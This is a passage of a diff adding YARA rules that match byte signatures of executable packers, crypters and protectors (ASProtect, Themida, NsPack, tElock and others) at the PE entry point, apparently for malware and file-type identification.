+condition:
+		$a0
+}
+	
+	
+rule aPackv098bDSESnotsaved
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8C CB BA ?? ?? 03 DA FC 33 F6 33 FF 4B 8E DB 8D ?? ?? ?? 8E C0 B9 ?? ?? F3 A5 4A 75 }
+
+condition:
+		$a0
+}
+	
+	
+rule ASProtectvIfyouknowthisversionpostonPEiDboardh2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? 00 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 DD 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule Aluwainv809
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B EC 1E E8 ?? ?? 9D 5E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AntiDote12DLLDemoSISTeam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 10 66 62 3A 43 2B 2B 48 4F 4F 4B 90 E9 08 32 90 90 90 90 90 90 90 90 90 90 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 0B 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0 08 8A 06 46 83 F0 FF 74 74 89 C5 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 75 20 41 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 83 C1 02 81 FD 00 F3 FF FF 83 D1 01 8D 14 2F 83 FD FC 76 0F 8A 02 42 88 07 47 49 75 F7 E9 63 FF FF FF 90 8B 02 83 C2 04 89 07 83 C7 04 83 E9 04 77 F1 01 CF E9 4C FF FF FF }
+
+condition:
+		$a0
+}
+	
+	
+rule MSLRHv032afakeMicrosoftVisualCemadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 CA 37 41 00 68 06 38 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 64 8F 05 00 00 00 00 83 C4 0C 5D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SoftwareCompressV12BGSoftwareProtectTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 BE 00 00 00 60 8B 74 24 24 8B 7C 24 28 FC B2 80 33 DB A4 B3 02 E8 6D 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Themida1201OreansTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? 35 09 89 95 ?? ?? 35 09 89 B5 ?? ?? 35 09 89 85 ?? ?? 35 09 83 BD ?? ?? 35 09 00 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? 35 09 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 }
+
+condition:
+		$a0
+}
+	
+	
+rule PECompactv126b1v126b2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 70 40 90 ?? 90 01 85 9E 70 40 BB ?? 05 0E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Cruncherv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 2E ?? ?? ?? ?? 2E ?? ?? ?? B4 30 CD 21 3C 03 73 ?? BB ?? ?? 8E DB 8D ?? ?? ?? B4 09 CD 21 06 33 C0 50 CB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AntiDote1214SEDLLSISTeam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 10 66 62 3A 43 2B 2B 48 4F 4F 4B 90 E9 08 32 90 90 90 90 90 90 90 90 90 90 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 0B 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC 11 DB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASProtectSKE21xexeAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule DBPEv210DingBoy
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 20 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9C 55 57 56 52 51 53 9C E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? EB 58 75 73 65 72 33 32 2E 64 6C 6C ?? 4D 65 73 73 61 67 65 42 6F 78 41 ?? 6B 65 72 6E 65 6C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPacKV37LiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D ?? ?? ?? ?? ?? 80 39 01 0F ?? ?? ?? 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElock099tE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 5E DF FF FF 00 00 00 ?? ?? ?? ?? E5 ?? ?? 00 00 00 00 00 00 00 00 00 05 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WinZipSelfExtractor22personaleditionWinZipComputing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 FF 15 58 70 40 00 B3 22 38 18 74 03 80 C3 FE 40 33 D2 8A 08 3A CA 74 10 3A CB 74 07 40 8A 08 3A CA 75 F5 38 10 74 01 40 52 50 52 52 FF 15 5C 70 40 00 50 E8 15 FB FF FF 50 FF 15 8C 70 40 00 5B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+rule ZipWorxSecureEXEv25ZipWORXTechnologiesLLC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 B8 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 53 65 63 75 72 65 45 58 45 20 45 78 65 63 75 74 61 62 6C 65 20 46 69 6C 65 20 50 72 6F 74 65 63 74 6F 72 0D 0A 43 6F 70 79 72 69 67 68 74 28 63 29 20 32 30 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackFullEdition117iBoxaPLibAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8D B5 79 29 00 00 8D 9D 2C 03 00 00 33 FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 0F FF 74 37 04 FF 34 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Alloyv1x2000
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 07 20 40 ?? 87 DD 6A 04 68 ?? 10 ?? ?? 68 ?? 02 ?? ?? 6A ?? FF 95 46 23 40 ?? 0B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FreeJoiner153Stubengine171GlOFF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 02 FD FF FF 6A 00 E8 0D 00 00 00 CC FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A8 10 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02MicrosoftVisualC70DLLAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8D 6C 01 00 81 EC 00 00 00 00 8B 45 90 83 F8 01 56 0F 84 00 00 00 00 85 C0 0F 84 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EYouDiDaiYueHeiFengGao
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 56 57 0F 31 8B D8 0F 31 8B D0 2B D3 C1 EA 10 B8 ?? ?? ?? ?? 0F 6E C0 B8 ?? ?? ?? ?? 0F 6E C8 0F F5 C1 0F 7E C0 0F 77 03 C2 ?? ?? ?? ?? ?? FF E0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptorV21Xsoftcompletecom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 C6 14 8B 55 FC E9 ?? FF FF FF }
+	$a1 = { E9 ?? ?? ?? ?? 66 9C 60 50 8D 88 ?? ?? ?? ?? 8D 90 04 16 ?? ?? 8B DC 8B E1 }
+
+condition:
+		$a0 or $a1 at pe.entry_point
+}
+	
+	
+rule PCShrinkerv045
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BD ?? ?? ?? ?? 01 AD E3 38 40 ?? FF B5 DF 38 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule yodasProtectorV1033AshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8E 00 00 00 E8 03 00 00 00 EB 01 ?? E8 81 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B7 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AA 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75 2D E8 03 00 00 00 EB 01 ?? 60 E8 00 00 00 00 5D 81 ED 07 E2 40 00 8B D5 81 C2 56 E2 40 00 52 E8 01 00 00 00 C3 C3 E8 03 00 00 00 EB 01 ?? E8 0E 00 00 00 E8 D1 FF FF FF C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 4B CC C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SoftSentryv211
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 EC ?? 53 56 57 E9 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv120EngdulekxtBorlandDelphiBorlandC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0F BE C1 EB 01 0E 8D 35 C3 BE B6 22 F7 D1 68 43 ?? ?? 22 EB 02 B5 15 5F C1 F1 15 33 F7 80 E9 F9 BB F4 00 00 00 EB 02 8F D0 EB 02 08 AD 8A 16 2B C7 1B C7 80 C2 7A 41 80 EA 10 EB 01 3C 81 EA CF AE F1 AA EB 01 EC 81 EA BB C6 AB EE 2C E3 32 D3 0B CB 81 EA AB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakeStonesPEEncryptor20FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 53 51 52 56 57 55 E8 00 00 00 00 5D 81 ED 42 30 40 00 FF 95 32 35 40 00 B8 37 30 40 00 03 C5 2B 85 1B 34 40 00 89 85 27 34 40 00 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov300
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 60 33 C9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptorv11Vaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B 04 24 83 E8 4F 68 ?? ?? ?? ?? FF D0 }
+	$a1 = { 8B 04 24 83 E8 4F 68 ?? ?? ?? ?? FF D0 B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule Fusion10jaNooNi
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 04 30 40 00 68 04 30 40 00 E8 09 03 00 00 68 04 30 40 00 E8 C7 02 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UpxLock1012CyberDoomTeamXBoBBobSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PCPEEncryptorAlphapreview
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 51 52 56 57 55 E8 00 00 00 00 5D 8B CD 81 ED 33 30 40 ?? 2B 8D EE 32 40 00 83 E9 0B 89 8D F2 32 40 ?? 80 BD D1 32 40 ?? 01 0F 84 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxKeypress1212
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? E8 ?? ?? E8 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EA ?? ?? ?? ?? 1E 33 DB 8E DB BB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SoftwareCompressv12BGSoftwareProtectTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 BE 00 00 00 60 8B 74 24 24 8B 7C 24 28 FC B2 80 33 DB A4 B3 02 E8 6D 00 00 00 73 F6 33 C9 E8 64 00 00 00 73 1C 33 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 12 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 2B CB 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 13 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 8E 02 D2 75 05 8A 16 46 12 D2 C3 33 C9 41 E8 EE FF FF FF 13 C9 E8 E7 FF FF FF 72 F2 C3 2B 7C 24 28 89 7C 24 1C 61 C3 60 FF 74 24 24 6A 40 FF 95 1A 0F 41 00 89 44 24 1C 61 C2 04 00 E8 00 00 00 00 81 2C 24 3A 10 41 00 5D E8 00 00 00 00 81 2C 24 31 01 00 00 8B 85 2A 0F 41 00 29 04 24 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPackV14LiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 B1 85 40 00 2D AA 85 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VProtectorV11Avcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 0B 5B 56 50 72 6F 74 65 63 74 5D 00 E8 24 00 00 00 8B 44 24 04 8B 00 3D 04 00 00 80 75 08 8B 64 24 08 EB 04 58 EB 0C E9 64 8F 05 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidium1300ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 04 ?? ?? ?? ?? E8 29 00 00 00 EB 02 ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 22 EB 02 ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 01 ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 01 ?? E8 D5 FF FF FF EB 02 ?? ?? EB 03 ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 02 ?? ?? E8 47 26 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule XXPack01bagie
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D EB 01 00 81 ED 5E 1F 40 00 EB 02 83 09 8D B5 EF 1F 40 00 EB 02 83 09 BA A3 11 00 00 EB 00 68 00 ?? ?? ?? C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeLocker10IonIce
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 60 8B 6C 24 20 81 ED 05 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule yodasProtectorV101AshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 53 56 57 E8 03 00 00 00 EB 01 ?? E8 86 00 00 00 E8 03 00 00 00 EB 01 ?? E8 79 00 00 00 E8 03 00 00 00 EB 01 ?? E8 A4 00 00 00 E8 03 00 00 00 EB 01 ?? E8 97 00 00 00 E8 03 00 00 00 EB 01 ?? E8 2D 00 00 00 E8 03 00 00 00 EB 01 ?? 60 E8 00 00 00 00 5D 81 ED D5 E4 41 00 8B D5 81 C2 23 E5 41 00 52 E8 01 00 00 00 C3 C3 E8 03 00 00 00 EB 01 ?? E8 0E 00 00 00 E8 D1 FF FF FF C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv2001AlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 72 05 00 00 EB 4C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule USERNAMEv300
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FB 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? 8C C8 2B C1 8B C8 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? 33 C0 8E D8 06 0E 07 FC 33 F6 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule nSpackV2xLiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 }
+
+condition:
+		$a0
+}
+	
+	
+rule GameGuardv20065xxdllsignbyhot_UNP
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 31 FF 74 06 61 E9 4A 4D 50 30 BA 4C 00 00 00 80 7C 24 08 01 0F 85 ?? 01 00 00 60 BE 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upack_PatchoranyVersionDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 09 00 00 00 ?? ?? ?? 00 E9 06 02 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PCPECalpha
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 51 52 56 57 55 E8 ?? ?? ?? ?? 5D 8B CD 81 ?? ?? ?? ?? ?? 2B ?? ?? ?? ?? ?? 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPACKv305c4Unextractable
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 03 05 00 1B B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Escargot01finalMeat
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 04 40 30 2E 31 60 68 61 ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 B8 92 ?? ?? ?? 8B 00 FF D0 50 B8 CD ?? ?? ?? 81 38 DE C0 37 13 75 2D 68 C9 ?? ?? ?? 6A 40 68 00 ?? 00 00 68 00 00 ?? ?? B8 96 ?? ?? ?? 8B 00 FF D0 8B 44 24 F0 8B 4C 24 F4 EB 05 49 C6 04 01 40 0B C9 75 F7 BE 00 10 ?? ?? B9 00 ?? ?? 00 EB 05 49 80 34 31 40 0B C9 75 F7 58 0B C0 74 08 33 C0 C7 00 DE C0 AD 0B BE ?? ?? ?? ?? E9 AC 00 00 00 8B 46 0C BB 00 00 ?? ?? 03 C3 50 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MetrowerksCodeWarriorv20GUI
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 53 56 83 EC 44 55 B8 FF FF FF FF 50 50 68 ?? ?? 40 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 68 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? 00 00 E8 ?? ?? 00 00 E8 }
+
+condition:
+		$a0
+}
+	
+	
+rule UnnamedScrambler21Beta211p0ke
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B9 15 00 00 00 6A 00 6A 00 49 75 F9 53 56 57 B8 ?? 3A ?? ?? E8 ?? EE FF FF 33 C0 55 68 ?? 43 ?? ?? 64 FF 30 64 89 20 BA ?? 43 ?? ?? B8 E4 64 ?? ?? E8 0F FD FF FF 8B D8 85 DB 75 07 6A 00 E8 ?? EE FF FF BA E8 64 ?? ?? 8B C3 8B 0D E4 64 ?? ?? E8 ?? D7 FF FF B8 F8 ?? ?? ?? BA 04 00 00 00 E8 ?? EF FF FF 33 C0 A3 F8 ?? ?? ?? BB ?? ?? ?? ?? C7 45 EC E8 64 ?? ?? C7 45 E8 ?? ?? ?? ?? C7 45 E4 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? B8 E0 ?? ?? ?? BA 04 00 00 00 E8 ?? EF FF FF 68 F4 01 00 00 E8 ?? EE FF FF 83 7B 04 00 75 0B 83 3B 00 0F 86 ?? 07 00 00 EB 06 0F 8E ?? 07 00 00 8B 03 8B D0 B8 E4 ?? ?? ?? E8 ?? E5 FF FF B8 E4 ?? ?? ?? E8 ?? E3 FF FF 8B D0 8B 45 EC 8B 0B E8 }
+
+condition:
+		$a0
+}
+	
+	
+rule NoodleCryptv20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 9A E8 3D 00 00 00 EB 01 9A E8 EB 01 00 00 EB 01 9A E8 2C 04 00 00 EB 01 }
+	$a1 = { EB 01 9A E8 ?? 00 00 00 EB 01 9A E8 ?? ?? 00 00 EB 01 9A E8 ?? ?? 00 00 EB 01 }
+
+condition:
+		$a0 at pe.entry_point or $a1
+}
+	
+	
+rule PoPa001PackeronPascalbagie
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 EC 53 56 57 33 C0 89 45 EC B8 A4 3E 00 10 E8 30 F6 FF FF 33 C0 55 68 BE 40 00 10 ?? ?? ?? ?? 89 20 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8D 55 EC 33 C0 E8 62 E7 FF FF 8B 45 EC E8 32 F2 FF FF 50 E8 B4 F6 FF FF A3 64 66 00 10 33 D2 55 68 93 40 00 10 64 FF 32 64 89 22 83 3D 64 66 00 10 FF 0F 84 3A 01 00 00 6A 00 6A 00 6A 00 A1 64 66 00 10 50 E8 9B F6 FF FF 83 E8 10 50 A1 64 66 00 10 50 E8 BC F6 FF FF 6A 00 68 80 66 00 10 6A 10 68 68 66 00 10 A1 64 66 00 10 50 E8 8B F6 FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule BlindSpot10s134k
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC 50 02 00 00 8D 85 B0 FE FF FF 53 56 A3 90 12 40 00 57 8D 85 B0 FD FF FF 68 00 01 00 00 33 F6 50 56 FF 15 24 10 40 00 56 68 80 00 00 00 6A 03 56 56 8D 85 B0 FD FF FF 68 00 00 00 80 50 FF 15 20 10 40 00 56 56 68 00 08 00 00 50 89 45 FC FF 15 1C 10 40 00 8D 45 F8 8B 1D 18 10 40 00 56 50 6A 34 FF 35 90 12 40 00 FF 75 FC FF D3 85 C0 0F 84 7F 01 00 00 39 75 F8 0F 84 76 01 00 00 A1 90 12 40 00 66 8B 40 30 66 3D 01 00 75 14 8D 85 E4 FE FF FF 68 04 01 00 00 50 FF 15 14 10 40 00 EB 2C 66 3D 02 00 75 14 8D 85 E4 FE FF FF 50 68 04 01 00 00 FF 15 10 10 40 00 EB 12 8D 85 E4 FE FF FF 68 04 01 00 00 50 FF 15 0C 10 40 00 8B 3D 08 10 40 00 8D 85 E4 FE FF FF 68 54 10 40 00 50 }
+
+condition:
+		$a0
+}
+	
+	
+rule GamehouseMediaProtectorVersionUnknown
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? ?? ?? 6A 00 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElockv042
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { C1 EE 00 66 8B C9 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 52 8B FE 68 79 01 59 EB 01 EB AC 54 E8 03 5C EB 08 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEStealthv274WebToolMaster
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 00 EB 17 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 60 90 E8 00 00 00 00 5D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEManagerVersion301994cSolarDesigner
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B4 30 1E 06 CD 21 2E ?? ?? ?? BF ?? ?? B9 ?? ?? 33 C0 2E ?? ?? 47 E2 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv02BetaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 88 01 ?? ?? AD 8B F8 95 A5 33 C0 33 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DEFv100Engbartxt
+{
+      meta:
+		author="malware-lu"
+strings:
